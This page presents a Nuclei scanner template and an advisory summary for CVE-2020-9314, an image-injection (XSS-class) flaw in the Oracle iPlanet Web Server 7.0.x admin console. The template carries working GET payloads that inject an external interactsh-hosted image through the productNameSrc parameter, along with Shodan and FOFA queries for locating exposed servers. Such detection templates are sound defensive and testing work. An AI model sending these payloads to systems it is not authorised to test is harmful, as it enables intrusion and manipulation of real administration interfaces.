Oracle iPlanet Web Server 7.0.x - Image Injection

CVE-2020-9314
Verified

Description

Oracle iPlanet Web Server 7.0.x allows image injection in the Administration console via the productNameSrc parameter to an admingui URI. This issue exists because of an incomplete fix for CVE-2012-0516.

Severity

Medium

CVSS Score

4.8

Exploit Probability

12%

Affected Product

iplanet_web_server

Published Date

January 23, 2026

Template Author

dhiyaneshdk

CVE-2020-9314.yaml
id: CVE-2020-9314

info:
  name: Oracle iPlanet Web Server 7.0.x - Image Injection
  author: DhiyaneshDk
  severity: medium
  description: |
    Oracle iPlanet Web Server 7.0.x allows image injection in the Administration console via the productNameSrc parameter to an admingui URI. This issue exists because of an incomplete fix for CVE-2012-0516.
  impact: |
    Attackers can inject malicious images into the admin console, potentially leading to social engineering, phishing attacks, or interface manipulation.
  remediation: |
    Oracle iPlanet Web Server 7.0.x is no longer supported. Migrate to a supported platform or restrict network access to the administration console.
  reference:
    - https://wwws.nightwatchcybersecurity.com/2020/05/10/two-vulnerabilities-in-oracles-iplanet-web-server-cve-2020-9315-and-cve-2020-9314/
    - http://seclists.org/fulldisclosure/2020/May/31
    - https://nvd.nist.gov/vuln/detail/CVE-2020-9314
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 4.8
    cve-id: CVE-2020-9314
    cwe-id: CWE-79
    epss-score: 0.12006
    epss-percentile: 0.93756
  metadata:
    verified: false
    max-request: 2
    vendor: oracle
    product: iplanet_web_server
    shodan-query: "Oracle-iPlanet-Web-Server"
    fofa-query: app="Oracle-iPlanet-Web-Server"
  tags: cve,cve2020,oracle,iplanet,injection,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/admingui/version/Version?productNameSrc=http://{{interactsh-url}}/test.jpg&productNameHeight=500&productNameWidth=500"
      - "{{BaseURL}}/admingui/version/Masthead.jsp?productNameSrc=http://{{interactsh-url}}/test.jpg&productNameHeight=500&productNameWidth=500"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "productNameSrc"
          - "Oracle iPlanet"
        condition: and

      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502205f685d831fd5d1ae81379ce30ba44bc80566391ed8cc8122e81eed32ecf4094a022100e947edc97e4e8bfa517bf88220b1367d3e8a0d4ac1de9290edbd8fc5d92e8b68:922c64590222798bb761d5b6d8e72950
CVSS Metrics

Score: 4.8
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
CVE ID: CVE-2020-9314
CWE ID: CWE-79

References

https://wwws.nightwatchcybersecurity.com/2020/05/10/two-vulnerabilities-in-oracles-iplanet-web-server-cve-2020-9315-and-cve-2020-9314/
http://seclists.org/fulldisclosure/2020/May/31
https://nvd.nist.gov/vuln/detail/CVE-2020-9314

Remediation Steps

Oracle iPlanet Web Server 7.0.x is no longer supported. Migrate to a supported platform or restrict network access to the administration console.